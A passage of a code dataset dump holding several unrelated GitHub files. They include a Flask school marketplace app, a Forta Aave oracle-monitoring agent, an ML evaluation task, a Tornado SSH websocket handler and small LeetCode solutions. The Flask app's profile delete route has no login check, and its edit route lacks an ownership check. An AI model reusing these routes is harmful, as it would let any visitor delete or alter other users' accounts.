db_session.create_session()\n    goods = db_sess.query(Goods)\n    if current_user.is_authenticated:\n        return render_template(\"index.html\", goods=goods)\n    return render_template(\"hello.html\")\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n    message = ''\n    form = RegisterForm()\n    db_sess = db_session.create_session()\n    if form.validate_on_submit():\n        if form.password.data != form.confirm_password.data:\n            return render_template(\"register.html\", title='Регистрация', form=form, message='Пароли не совпадают')\n        if db_sess.query(User).filter(User.email == form.email.data).first():\n            return render_template(\"register.html\", title='Регистрация', form=form,\n                                   message='Такой пользователь уже существует')\n        if db_sess.query(User).filter(User.phone == form.phone.data).first():\n            return render_template(\"register.html\", title='Регистрация', form=form,\n                                   message='Такой пользователь уже существует')\n        user = User(\n            username=form.username.data,\n            classnum=form.classnum.data,\n            phone=form.phone.data,\n            email=form.email.data\n        )\n        user.set_password(form.password.data)\n        db_sess.add(user)\n        db_sess.commit()\n        return redirect('/login')\n    return render_template(\"register.html\", title='Регистрация', form=form, message=message)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n    form = LoginForm()\n    db_sess = db_session.create_session()\n    if form.validate_on_submit():\n        user = db_sess.query(User).filter(User.email == form.email.data).first()\n        if user and user.check_password(form.password.data):\n            login_user(user, remember=form.remember_me.data)\n            return redirect('/my_profile')\n        return render_template(\"login.html\", form=form, title='Авторизация', message=\"Неправильный логин или пароль\")\n    return render_template('login.html', form=form, title='Авторизация')\n\n\n@app.route('/my_profile')\n@login_required\ndef profile():\n    db_sess = db_session.create_session()\n    users = db_sess.query(User).filter(User.id == current_user.id).first()\n    return render_template(\"my_profile.html\", title=\"Профиль\", users=users)\n\n\n@app.route('/users/<int:id>', methods=['GET', 'POST'])\n@login_required\ndef edit_profile(id):\n    form = EditForm()\n    if request.method == \"GET\":\n        db_sess = db_session.create_session()\n        users = db_sess.query(User).filter(User.id == id).first()\n        if users:\n            form.username.data = users.username\n            form.classnum.data = users.classnum\n            form.phone.data = users.phone\n            form.email.data = users.email\n        else:\n            abort(404)\n    if form.validate_on_submit():\n        db_sess = db_session.create_session()\n        users = db_sess.query(User).filter(User.id == id).first()\n        if users:\n            users.username = form.username.data\n            users.classnum = form.classnum.data\n            users.phone = form.phone.data\n            users.email = form.email.data\n            db_sess.commit()\n            return redirect('/my_profile')\n        else:\n            abort(404)\n    return render_template('edit_profile.html',\n                           title='Редактирование профиля',\n                           form=form)\n\n\n@app.route('/users_delete/<int:id>', methods=['GET', 'POST'])\ndef delete_profile(id):\n    db_sess = db_session.create_session()\n    users = db_sess.query(User).filter(User.id == id).first()\n    if users:\n        db_sess.delete(users)\n        db_sess.commit()\n        return redirect('/logout')\n    else:\n        abort(404)\n    return redirect('/')\n\n\n# @app.route('/profile/<int:id>')\n# @login_required\n# def seller_profile(id):\n#     db_sess = db_session.create_session()\n#     users = db_sess.query(User).filter(User.id == id).first()\n#     return render_template('profile.html', title='Профиль продавцв', users=users)\n\n\n@app.route('/my_goods', 
methods=['GET', 'POST'])\n@login_required\ndef my_goods():\n db_sess = db_session.create_session()\n goods = db_sess.query(Goods).filter(Goods.user_id == current_user.id)\n if goods:\n return render_template(\"my_goods.html\", goods=goods, title=\"Мои объявления\")\n return redirect(\"/\")\n\n\n@app.route('/all_goods', methods=['GET', 'POST'])\n@login_required\ndef all_goods():\n db_sess = db_session.create_session()\n goods = db_sess.query(Goods)\n if goods:\n return render_template(\"all_goods.html\", goods=goods, title=\"Все объявления\")\n return redirect(\"/my_profile\")\n\n\n@app.route('/add_goods', methods=['GET', 'POST'])\n@login_required\ndef add_goods():\n form = GoodsForm()\n if form.validate_on_submit():\n filename = secure_filename(form.file.data.filename)\n db_sess = db_session.create_session()\n goods = Goods()\n goods.title = form.title.data\n goods.description = form.description.data\n goods.price = form.price.data\n goods.picture = f\"img/{filename}\"\n current_user.goods.append(goods)\n db_sess.merge(current_user)\n db_sess.commit()\n return redirect('/my_goods')\n return render_template('add_goods.html', title='Добавление товара',\n form=form)\n\n\n@app.route('/goods/<int:id>', methods=['GET', 'POST'])\n@login_required\ndef edit_goods(id):\n form = GoodsForm()\n if request.method == \"GET\":\n db_sess = db_session.create_session()\n goods = db_sess.query(Goods).filter(Goods.id == id, Goods.user == current_user).first()\n if goods:\n form.title.data = goods.title\n form.description.data = goods.description\n form.price.data = goods.price\n else:\n abort(404)\n if form.validate_on_submit():\n db_sess = db_session.create_session()\n goods = db_sess.query(Goods).filter(Goods.id == id, Goods.user == current_user).first()\n if goods:\n filename = secure_filename(form.file.data.filename)\n goods.title = form.title.data\n goods.description = form.description.data\n goods.price = form.price.data\n goods.picture = f\"img/{filename}\"\n db_sess.commit()\n return redirect('/my_goods')\n else:\n abort(404)\n return render_template('edit_goods.html',\n title='Редактирование товара',\n form=form)\n\n\n@app.route('/goods_delete/<int:id>', methods=['GET', 'POST'])\n@login_required\ndef goods_delete(id):\n db_sess = db_session.create_session()\n goods = db_sess.query(Goods).filter(Goods.id == id, Goods.user == current_user).first()\n if goods:\n db_sess.delete(goods)\n db_sess.commit()\n else:\n abort(404)\n return redirect('/my_goods')\n\n\n@app.route('/goods_info/<int:id>', methods=['GET', 'POST'])\ndef goods_info(id):\n db_sess = db_session.create_session()\n goods = db_sess.query(Goods).filter(Goods.id == id).first()\n return render_template('good.html',\n goods=goods,\n title='Товар')\n\n\n@app.route('/profile/<int:id>', methods=['GET', 'POST'])\ndef profile_info(id):\n db_sess = db_session.create_session()\n users = db_sess.query(User).filter(User.id == id).first()\n return render_template('profile.html', users=users, title='Профиль продавца')\n\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect('/')\n\n\n@app.route('/about')\ndef about():\n return render_template('about.html', title='Подробнее')\n\n\ndef main():\n db_session.global_init('db/SchoolSwap.sqlite')\n app.run(port=8080, host='127.0.0.1')\n\n\nif __name__ == '__main__':\n get_map_picture()\n main()\n 
os.remove('static/img/map.png')\n","repo_name":"WhoReadThisWillDie/SchoolSwap","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23790035751","text":"import ipaddress\nimport re\nfrom pathlib import Path\nfrom threading import Thread\nfrom typing import List, Generator, Callable\n\n\nclass CdnProxyException(Exception):\n pass\n\n\ndef trim(s: str, length: int):\n if len(s) <= length:\n return s\n else:\n return s[0:length] + \"...\"\n\n\ndef targets_to_hosts(networks: List[str]) -> Generator[str, None, None]:\n for net in networks:\n p = Path(net)\n if p.is_file():\n for m in re.finditer(r'([0-9]{1,3}\\.){3}[0-9]{1,3}(?:/\\d\\d?)?', p.read_text()):\n for host in ipaddress.ip_network(m.group(0)).hosts():\n yield str(host)\n else:\n for host in ipaddress.ip_network(net).hosts():\n yield str(host)","repo_name":"RyanJarv/cdn-proxy","sub_path":"cdn_proxy/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"48"} +{"seq_id":"22380467607","text":"from forta_agent import Finding, FindingType, FindingSeverity\nfrom .constants import AAVE_PRICE_ORACLE_ADDRESS, SET_FALLBACK_ORACLE_FUNCTION_ABI\n\n\ndef handle_transaction(transaction_event):\n findings = []\n set_fallback_oracle_invocations = transaction_event.filter_function(SET_FALLBACK_ORACLE_FUNCTION_ABI, AAVE_PRICE_ORACLE_ADDRESS)\n print(transaction_event)\n\n for invocation in set_fallback_oracle_invocations:\n args = invocation[1]\n findings.append(Finding({\n 'name': 'Aave Set Fallback Oracle Function Agent',\n 'description': f'AavepriceOracle.setFallbackOracle() function is called. 
Fallback oracle value: {args[\"fallbackOracle\"]}',\n 'alert_id': 'AAVE-1',\n 'type': FindingType.Suspicious,\n 'severity': FindingSeverity.Critical,\n 'metadata': {\n 'fallback_oracle': args['fallbackOracle'],\n 'tx_hash': transaction_event.hash\n }\n }))\n return findings\n\n","repo_name":"ssozuer/aave-fallback-oracle-function-agent","sub_path":"src/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19251042587","text":"from mars_gym.evaluation.policy_estimator import PolicyEstimatorTraining\nfrom mars_gym.torch.data import FasterBatchSampler, NoAutoCollationDataLoader\nfrom mars_gym.utils.reflection import load_attr, get_attribute_names\nfrom mars_gym.utils.utils import parallel_literal_eval, JsonEncoder\nfrom mars_gym.utils.index_mapping import (\n create_index_mapping,\n create_index_mapping_from_arrays,\n transform_with_indexing,\n map_array,\n)\nimport functools\nfrom multiprocessing.pool import Pool\nfrom mars_gym.evaluation.task import BaseEvaluationTask\nimport abc\nfrom typing import Type, Dict, List, Optional, Tuple, Union, Any, cast\nfrom torch.utils.data import DataLoader\nfrom mars_gym.torch.data import NoAutoCollationDataLoader, FasterBatchSampler\nfrom torchbearer import Trial\nfrom data import SessionInteractionDataFrame\nimport gc\nimport luigi\nimport pandas as pd\nimport numpy as np\nimport os\nimport pickle\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom mars_gym.cuda import CudaRepository\nimport torchbearer\nfrom tqdm import tqdm\nfrom mars_gym.data.dataset import (\n preprocess_interactions_data_frame,\n InteractionsDataset,\n)\nfrom mars_gym.utils.index_mapping import (\n transform_with_indexing,\n)\nfrom mars_gym.data.dataset import (\n preprocess_interactions_data_frame,\n InteractionsDataset,\n)\nfrom mars_gym.evaluation.metrics.rank import (\n mean_reciprocal_rank,\n average_precision,\n precision_at_k,\n ndcg_at_k,\n personalization_at_k,\n prediction_coverage_at_k,\n)\nfrom mars_gym.utils.utils import parallel_literal_eval, JsonEncoder\nimport pprint\nimport json\nimport luigi\nimport pandas as pd\nimport functools\nimport numpy as np\nfrom tqdm import tqdm\nimport os\nfrom multiprocessing.pool import Pool\nfrom scipy import stats\n#from train import MostPopularTraining, CoOccurrenceTraining\nfrom sklearn.metrics import classification_report\nfrom train import CoOccurrenceTraining\nimport pickle \n\nSCORE_LIMIT = 200\n\ndef acc(r, k =4):\n r = r[:k]\n return np.sum(r)\n\ndef _sort_rank_list(scores, cities_list, neighbors_idx, index_mapping):\n # UNK, PAD, PAD, Cities in List\n #from IPython import embed; embed()\n scores[0] = scores[1] = scores[2] = scores[3] = 0\n #scores[cities_list] = 0\n\n item_idx = np.argsort(scores)[::-1][:SCORE_LIMIT]\n \n if neighbors_idx and len(np.unique(neighbors_idx)) > 0:\n neighbors_idx = np.unique(neighbors_idx)\n \n # Not Neighbors\n n_idx = list(set(np.arange(len(scores))) - set(neighbors_idx))\n scores[n_idx] = 0\n\n item_idx = np.argsort(scores)[::-1][:SCORE_LIMIT]\n item_id = [int(index_mapping[item]) for item in item_idx if item in neighbors_idx and index_mapping[item] != \"M\"]\n else:\n item_id = [int(index_mapping[item]) for item in item_idx if index_mapping[item] != \"M\"]\n #\n return item_id\n\ndef _get_moda(arr):\n try:\n return stats.mode(arr)[0][0]\n except:\n return 0 \n\ndef _get_count_moda(arr):\n try:\n return stats.mode(arr)[1][0]/len(arr)\n 
except:\n return 0 \n\ndef _create_relevance_list(sorted_actions, expected_action):\n return [1 if str(action) == str(expected_action) else 0 for action in sorted_actions]\n\n\n# PYTHONPATH=\".\" luigi --module mercado_livre.evaluation MLEvaluationTask \\\n# --model-task-class \"mars_gym.simulation.training.SupervisedModelTraining\" \\\n# --model-task-id SupervisedModelTraining____mars_gym_model_b____e3ae64b091 \\\n# --normalize-file-path \"226cbf7ae2_std_scaler.pkl\" \\\n# --history-window 20 \\\n# --batch-size 1000 \\\n# --local-scheduler \\\n# --file \"/media/workspace/triplet_session/output/mercado_livre/dataset/test_0.10_test=random_42_SessionInteractionDataFrame_____SessionID_226cbf7ae2.csv\"\n\nclass EvaluationTask(BaseEvaluationTask):\n model_task_class: str = luigi.Parameter(\n default=\"mars_gym.simulation.training.SupervisedModelTraining\"\n )\n model_task_id: str = luigi.Parameter()\n offpolicy_eval: bool = luigi.BoolParameter(default=False)\n task_hash: str = luigi.Parameter(default=\"sub\")\n generator_workers: int = luigi.IntParameter(default=0)\n pin_memory: bool = luigi.BoolParameter(default=False)\n batch_size: int = luigi.IntParameter(default=1000)\n device: str = luigi.ChoiceParameter(choices=[\"cpu\", \"cuda\"], default=\"cuda\")\n normalize_dense_features: int = luigi.Parameter(default=\"min_max\")\n normalize_file_path: str = luigi.Parameter(default=None)\n file: str = luigi.Parameter(default=\"\")\n neighbors_file: str = luigi.Parameter(default=None)\n model_eval: str = luigi.ChoiceParameter(choices=[\"model\", \"most_popular\", \"coocorrence\"], default=\"model\")\n submission_size: int = luigi.IntParameter(default=4)\n\n @property\n def task_name(self):\n return self.model_task_id + \"_\" + self.task_id.split(\"_\")[-1]\n\n # def requires(self):\n # if self.local:\n # return SessionInteractionDataFrame(history_window=self.history_window)\n # else:\n # return SplitTrainTestDataset(sample_days=self.history_window)\n # sample_days: int = luigi.IntParameter(default=30)\n # test_days: int = luigi.IntParameter(default=7)\n # window_trip: int = luigi.IntParameter(default=5)\n\n @property\n def torch_device(self) -> torch.device:\n if not hasattr(self, \"_torch_device\"):\n if self.device == \"cuda\":\n self._torch_device = torch.device(f\"cuda:{self.device_id}\")\n else:\n self._torch_device = torch.device(\"cpu\")\n return self._torch_device\n\n @property\n def device_id(self):\n if not hasattr(self, \"_device_id\"):\n if self.device == \"cuda\":\n self._device_id = CudaRepository.get_avaliable_device()\n else:\n self._device_id = None\n return self._device_id\n\n def get_test_generator(self, df) -> Optional[DataLoader]:\n\n dataset = InteractionsDataset(\n data_frame=df,\n embeddings_for_metadata=self.model_training.embeddings_for_metadata,\n project_config=self.model_training.project_config,\n index_mapping=self.model_training.index_mapping\n )\n\n batch_sampler = FasterBatchSampler(\n dataset, self.batch_size, shuffle=False\n )\n\n return NoAutoCollationDataLoader(\n dataset,\n batch_sampler=batch_sampler,\n num_workers=self.generator_workers,\n pin_memory=self.pin_memory if self.device == \"cuda\" else False,\n )\n\n def run(self):\n os.makedirs(self.output().path)\n \n df: pd.DataFrame = pd.read_csv(self.file)\n df = df[df['trip_size'] > 0] # TODO Remove\n\n target = 'last_city_id'\n print(df.head())\n if target in df.columns:\n df_metric = df[['utrip_id', 'city_id_list', 'last_city_id', 'last_hotel_country']]\n\n df = preprocess_interactions_data_frame(\n df, \n 
self.model_training.project_config\n )\n\n data = SessionInteractionDataFrame()\n # item_column=\"\",\n # normalize_dense_features=self.normalize_dense_features,\n # normalize_file_path=self.normalize_file_path\n\n df = data.transform_data_frame(df, \"TEST_GENERATOR\")\n\n df.to_csv(self.output().path+\"/dataset.csv\")\n\n transform_with_indexing(\n df, \n self.model_training.index_mapping, \n self.model_training.project_config\n )\n # \n df.to_csv(self.output().path+\"/dataset_indexed.csv\")\n generator = self.get_test_generator(df)\n\n print(df.head())\n print(df.shape)\n\n \n index_mapping = self.model_training.index_mapping['last_city_id']\n reverse_index_mapping = self.model_training.reverse_index_mapping['last_city_id']\n reverse_index_mapping[1] = 0\n #from IPython import embed; embed()\n # Map Neighbors\n neighbors_file = None\n neighbors_dict = None\n if self.neighbors_file:\n print(\"load neighbors...\")\n with open(self.neighbors_file, \"rb\") as pkl_handle:\n neighbors_file = pickle.load(pkl_handle)\n neighbors_dict = {}\n for key, values in neighbors_file.items():\n neighbors_dict[index_mapping[key]] = [index_mapping[k] for k in values]\n neighbors_dict[0] = []\n neighbors_dict[1] = []\n neighbors_dict[2] = []\n neighbors_dict[3] = []\n \n\n if self.model_eval == \"model\":\n rank_list = self.model_rank_list(generator, reverse_index_mapping, neighbors_dict)\n # elif self.model_eval == \"most_popular\":\n # rank_list = self.most_popular_rank_list(generator, reverse_index_mapping)\n elif self.model_eval == \"coocorrence\":\n rank_list = self.coocorrence_rank_list(generator, reverse_index_mapping, neighbors_dict)\n\n # Save metrics\n if target in df.columns:\n self.save_metrics(df_metric, rank_list)\n\n self.save_submission(df_metric, rank_list)\n\n def save_submission(self, df_metric, rank_list):\n\n df_metric['reclist'] = list(rank_list)\n df_metric['city_id_1'] = df_metric['reclist'].apply(lambda reclist: reclist[0])\n df_metric['city_id_2'] = df_metric['reclist'].apply(lambda reclist: reclist[1])\n df_metric['city_id_3'] = df_metric['reclist'].apply(lambda reclist: reclist[2])\n df_metric['city_id_4'] = df_metric['reclist'].apply(lambda reclist: reclist[3])\n\n # base submission\n df_metric[['utrip_id', 'city_id_1', 'city_id_2', 'city_id_3', 'city_id_4']]\\\n .to_csv(self.output().path+'/submission_{}.csv'.format(self.task_name), index=False)\n\n # Save submission\n #np.savetxt(self.output().path+'/submission_{}.csv'.format(self.task_name), rank_list, fmt='%i', delimiter=',') \n df_metric[['utrip_id', 'reclist']]\\\n .to_csv(self.output().path+'/all_reclist_{}.csv'.format(self.task_name), index=False)\n\n def save_metrics(self, df_metric, rank_list):\n #from IPython import embed; embed()\n df_metric['reclist'] = list(rank_list)\n df_metric['predict'] = df_metric['reclist'].apply(lambda l: l[0] if len(l) > 0 else 0)\n #from IPython import embed; embed()\n df_metric['acc@4'] = df_metric.apply(lambda row: row['last_city_id'] in row.reclist[:4], axis=1).astype(int)\n \n metric = {\n 'task_name': self.task_name,\n 'count': len(df_metric),\n 'acc@4': df_metric['acc@4'].mean()\n }\n\n # Save Metrics\n with open(os.path.join(self.output().path, \"metric.json\"), \"w\") as params_file:\n json.dump(metric, params_file, default=lambda o: dict(o), indent=4)\n \n df_metric.to_csv(self.output().path+'/metric.csv', index=False)\n\n pd.DataFrame(\n classification_report(df_metric['last_city_id'], df_metric['predict'], output_dict=True)\n ).transpose().sort_values('support', ascending=False ) 
\\\n            .to_csv(self.output().path+'/classification_report.csv')\n\n        # Print\n        print(json.dumps(metric, indent=4))\n\n    def model_rank_list(self, generator, reverse_index_mapping, neighbors_dict):\n\n        # Get Model\n        model = self.model_training.get_trained_module()\n        model.to(self.torch_device)\n        model.eval()\n\n        scores = []\n        rank_list  = []\n        idx_item_id = 2\n\n        def get_neighbors(n, neighbors_dict):\n            neighbors = [neighbors_dict[i] for i in n if i in neighbors_dict]\n            neighbors = list(np.unique(sum(neighbors, [])))\n            return neighbors\n\n        # Inference\n        with torch.no_grad():\n            for i, (x, _) in tqdm(enumerate(generator), total=len(generator)):\n                input_params = x if isinstance(x, list) or isinstance(x, tuple) else [x]\n                input_params = [t.to(self.torch_device) if isinstance(t, torch.Tensor) else t for t in input_params]\n\n                scores_tensor: torch.Tensor = model.recommendation_score(*input_params)\n                scores_batch = scores_tensor.detach().cpu().numpy()\n\n                cities_list = x[2].detach().cpu().numpy()\n                #neighbors_dict\n                #from IPython import embed; embed()\n                \n                # Neighbors\n                if neighbors_dict:\n                    # last_item_idx = x[idx_item_id].numpy()[:,-1]\n                    # neighbors_idx  = []\n                    # for i in last_item_idx:\n                    #     if i in neighbors_dict:\n                    #         neighbors_idx.append(neighbors_dict[i])\n                    #     else:\n                    #         neighbors_idx.append(list(neighbors_dict.keys()))\n                    \n                    neighbors_idx = [get_neighbors(n, neighbors_dict) for n in x[idx_item_id].numpy()]\n                    #from IPython import embed; embed()\n                else:\n                    #scores.extend(scores_batch)\n                    neighbors_idx = [None for i in range(len(scores_batch))]\n                # Test\n                _sort_rank_list(scores_batch[0], neighbors_idx=neighbors_idx[0], cities_list=cities_list[0], index_mapping=reverse_index_mapping)\n                \n                #from IPython import embed; embed()\n                with Pool(3) as p:\n                    _rank_list = list(tqdm(\n                        p.starmap(functools.partial(_sort_rank_list, index_mapping=reverse_index_mapping), zip(scores_batch, cities_list, neighbors_idx)),\n                        total=len(scores_batch),\n                    ))\n                \n                rank_list.extend(_rank_list)\n                #from IPython import embed; embed()\n                gc.collect()\n        #from IPython import embed; embed()\n        return rank_list\n\n    def coocorrence_rank_list(self, generator, reverse_index_mapping, neighbors_file):\n        \n\n        cooccurrence = CoOccurrenceTraining(project=\"config.base_rnn\",\n                        data_frames_preparation_extra_params=self.model_training.data_frames_preparation_extra_params,\n                        test_size=self.model_training.test_size,\n                        val_size=self.model_training.val_size,\n                        test_split_type=self.model_training.test_split_type,\n                        dataset_split_method=self.model_training.dataset_split_method) #\n        cooccurrence.fit(self.model_training.train_data_frame)\n\n        scores = []\n        rank_list  = []\n\n        # Inference\n        for i, (x, _) in tqdm(enumerate(generator), total=len(generator)):\n            input_params = x if isinstance(x, list) or isinstance(x, tuple) else [x]\n\n            scores_batch = [] # nxk\n            item_idx = list(range(self.model_training.n_items))\n            for item_history in input_params[2]:\n                last_item_idx = item_history.detach().cpu().numpy()[0]\n\n                score = [cooccurrence.get_score(last_item_idx, i) for i in item_idx]\n                \n\n                scores_batch.append(score)\n\n            # Test\n            _sort_rank_list(scores_batch[0], cities_list=None, neighbors_idx=None, index_mapping=reverse_index_mapping)\n\n            with Pool(3) as p:\n                _rank_list = list(tqdm(\n                    p.map(functools.partial(_sort_rank_list, cities_list=None, neighbors_idx=None, index_mapping=reverse_index_mapping), scores_batch),\n                    total=len(scores_batch),\n                ))\n            rank_list.extend(_rank_list)\n\n            gc.collect()\n        \n        return 
rank_list","repo_name":"marlesson/booking_challenge","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":15761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24978313664","text":"from setuptools import setup, find_packages\nimport pathlib\n\n# The directory containing this file\nHERE = pathlib.Path(__file__).parent\n\n# The text of the README file\nREADME = (HERE / \"README.md\").read_text()\n\nsetup(\n name=\"amc-cropper\",\n version=\"0.0.5\",\n description=\"Crops AMC files to descired length based on provided fps, start, and end whole seconds. Works through command line.\",\n long_description_content_type=\"text/markdown\",\n long_description=README,\n packages=find_packages(include=[\"amccrop\",\"amccrop.*\"]),\n classifiers=[\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"License :: OSI Approved :: MIT License\",\n \"Natural Language :: English\",\n \"Topic :: Software Development :: Libraries\",\n ],\n url=\"https://github.com/UomoCaffeLatte/AMCCrop\",\n author=\"Nikhil Reji\",\n author_email=\"Nikhil.Reji@live.co.uk\",\n install_requires=[\"AsfAmc-Parser\"],\n entry_points={\n \"console_scripts\": [\n \"amccrop=amccrop.__main__:main\",\n ]\n },\n)","repo_name":"UomoCaffeLatte/AMCCrop","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16207794621","text":"def jump(nums) -> int:\n if len(nums) == 1:\n return 0\n new_list = list()\n for index in range(len(nums)):\n new_list.append(index+nums[index])\n total = 0\n start = 0\n end = len(nums)-1\n while start != end:\n for index in range(start, end+1):\n if new_list[index] >= end:\n total += 1\n end = index\n break\n return total\n\nprint(jump([2,3,1,1,4]))\nprint(jump([2,3,0,1,4]))\nprint(jump([2,1]))\nprint(jump([1,1,1,1]))","repo_name":"nvk681/Python-Practice","sub_path":"python/jump_game_2.py","file_name":"jump_game_2.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16775220537","text":"from tornado.websocket import WebSocketHandler\r\nfrom app import logger, config\r\nfrom .ssh import SSH\r\nimport threading\r\nfrom app.model.servers import Server\r\nimport os\r\nimport asyncio\r\n\r\n\r\nclass SshHandler(WebSocketHandler):\r\n\r\n def check_origin(self, origin):\r\n return True\r\n\r\n # def initialize(self, *args,**kwargs):\r\n # print('----')\r\n # print(args, kwargs)\r\n\r\n def _reading(self):\r\n asyncio.set_event_loop(asyncio.new_event_loop())\r\n while True:\r\n data = self.ssh.read()\r\n self.write_message(data)\r\n\r\n def open(self, *args, **kwargs):\r\n logger.info(\"Websocket 打开\")\r\n if args:\r\n server_id = int(args[0])\r\n server = Server.query.get(server_id)\r\n # if server.passwd:\r\n # self.ssh = SSH(server.host, server.port,\r\n # server.user, server.passwd)\r\n # elif server.perm:\r\n # keyfile = os.path.join(config.read(\"UPLOAD_PATH\"), server.perm)\r\n # self.ssh = SSH(server.ip, server.port,\r\n # server.user, keyfile=keyfile)\r\n if server.perm:\r\n keyfile = os.path.join(config.read(\"UPLOAD_PATH\"), server.perm)\r\n else:\r\n keyfile = None\r\n self.ssh = SSH(server.ip, server.port,\r\n server.user, server.passwd, keyfile, server.passcode)\r\n\r\n t = threading.Thread(target=self._reading)\r\n 
t.setDaemon(True)\r\n t.start()\r\n\r\n def on_message(self, message):\r\n if message.startswith(\"size\"):\r\n cols, rows = message.split(':')[1].split(',')\r\n self.ssh.resize(int(cols), int(rows))\r\n else:\r\n self.ssh.send(message)\r\n\r\n def on_close(self):\r\n print(\"WebSocket Closed\")\r\n","repo_name":"jellyfrank/flask_manager","sub_path":"app/ws/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"43021477754","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass BSTIterator:\n\n def __init__(self, root: TreeNode):\n if not root:\n self.g = iter(())\n self.has_next = False\n self.cache = None\n return\n \n def g(root):\n if root.left:\n yield from g(root.left)\n yield root.val\n if root.right:\n yield from g(root.right)\n \n self.g = g(root)\n self.has_next = None\n self.cache = None\n\n \n def next(self) -> int:\n \"\"\"\n @return the next smallest number\n \"\"\"\n if self.cache is not None:\n v = self.cache\n self.cache = None\n self.has_next = None\n else:\n v = next(self.g, None)\n return v\n \n\n def hasNext(self) -> bool:\n \"\"\"\n @return whether we have a next smallest number\n \"\"\"\n if self.has_next is None:\n self.cache = next(self.g, None)\n if self.cache is None:\n self.has_next = False\n else:\n self.has_next = True\n return self.has_next\n\n\n# Your BSTIterator object will be instantiated and called as such:\n# obj = BSTIterator(root)\n# param_1 = obj.next()\n# param_2 = obj.hasNext()","repo_name":"IvanaGyro/LeetCode-Answer","sub_path":"0173_20190426_015042.py","file_name":"0173_20190426_015042.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10868077231","text":"import os\nimport pandas as pd\nimport sys\nfrom processing import process_volume, measure\n\nif __name__ == \"__main__\":\n base_path = os.path.abspath(__file__ + \"/..\")\n\n expansion_factors = pd.read_csv(base_path + \"/data/expansion_factors.csv\")\n expansion_factors_dict = {}\n\n input_batch = sys.argv[1:]\n\n for input_folder in input_batch:\n if not os.path.isdir(input_folder):\n raise Exception(input_folder + \" is not a directory. Inputs must be a folder of files.\")\n \n row = expansion_factors[expansion_factors[\"id\"] == os.path.basename(input_folder)[4:-4]]\n expansion_factor = row[\"expansion_factor\"].values[0]\n\n if not expansion_factor:\n raise Exception(input_folder + \" does not have an expansion factor.\")\n \n expansion_factors_dict[input_folder] = expansion_factor\n \n assert len(input_batch) == len(expansion_factors_dict), \"Collisions when creating expansion_factor dictionary (i.e. 
one to many relationship).\"\n\n print(f\"Number of volumes: {len(expansion_factors_dict)}\")\n\n save_file = base_path + \"/data/segmentation_data.csv\"\n\n with open(save_file, \"w\") as f:\n f.write(\"id,image_volume (um3),axon_volume (um3),axon_length (um),avg_axon_radius (um)\\n\")\n\n for input_folder, expansion_factor in expansion_factors_dict.items():\n name = os.path.basename(input_folder)\n print(f\"Processing {name}\")\n\n vol = process_volume(input_folder)\n data = measure(vol, expansion_factor)\n \n with open(save_file, \"a\") as f:\n f.write(f\"{name},{data[0]},{data[1]},{data[2]},{data[3]}\\n\")","repo_name":"kamodulin/expansion-microscopy","sub_path":"process_batch.py","file_name":"process_batch.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15440310725","text":"import json\nfrom time import time\nfrom os import remove\nfrom os.path import exists\n\nfrom mhooge_flask.logging import logger\nimport flask\n\nimport api.util as api_util\nimport app.util as app_util\nfrom api.awards import get_intfar_reasons, get_doinks_reasons\nfrom api.game_data import get_stat_quantity_descriptions\nfrom discbot.commands.util import ADMIN_DISC_ID\n\nstart_page = flask.Blueprint(\"index\", __name__, template_folder=\"templates\")\n\ndef format_duration_approx(timestamp):\n time_now = time()\n duration = time_now - timestamp\n if duration < 60:\n metric = \"sec\"\n elif duration < 60 * 60:\n metric = \"min\"\n duration = duration / 60\n elif duration < 60 * 60 * 24:\n metric = \"hour\"\n duration = duration / (60 * 60)\n elif duration < 60 * 60 * 24 * 30:\n metric = \"day\"\n duration = duration / (60 * 60 * 24)\n else:\n metric = \"month\"\n duration = duration / (60 * 60 * 24 * 30)\n\n duration = int(duration)\n if duration > 1:\n metric = metric + \"s\"\n\n return f\"{duration} {metric} ago\"\n\ndef get_intfar_desc(game, game_data):\n _, _, disc_id, _, intfar_id, intfar_str = game_data\n intfar_reasons = get_intfar_reasons(game).values()\n response_list = None\n\n if disc_id == intfar_id:\n name = app_util.discord_request(\"func\", \"get_discord_nick\", disc_id)\n response_list = [\n (\"name\", name), (\"regular\", \"got\"),\n (\"feed-award\", \"Int-Far\"), (\"regular\", \"for\")\n ]\n count = 0\n for reason, char in zip(intfar_reasons, intfar_str):\n if char == \"1\":\n if count != 0:\n response_list.append((\"regular\", \"and\"))\n response_list.append((\"bold\", reason))\n count += 1\n\n return response_list\n\ndef get_doinks_desc(game, game_data):\n _, _, disc_id, doinks_str, _, _ = game_data\n doinks_reasons = get_doinks_reasons(game).values()\n response_list = None\n\n if doinks_str is not None:\n name = app_util.discord_request(\"func\", \"get_discord_nick\", disc_id)\n response_list = [\n (\"name\", 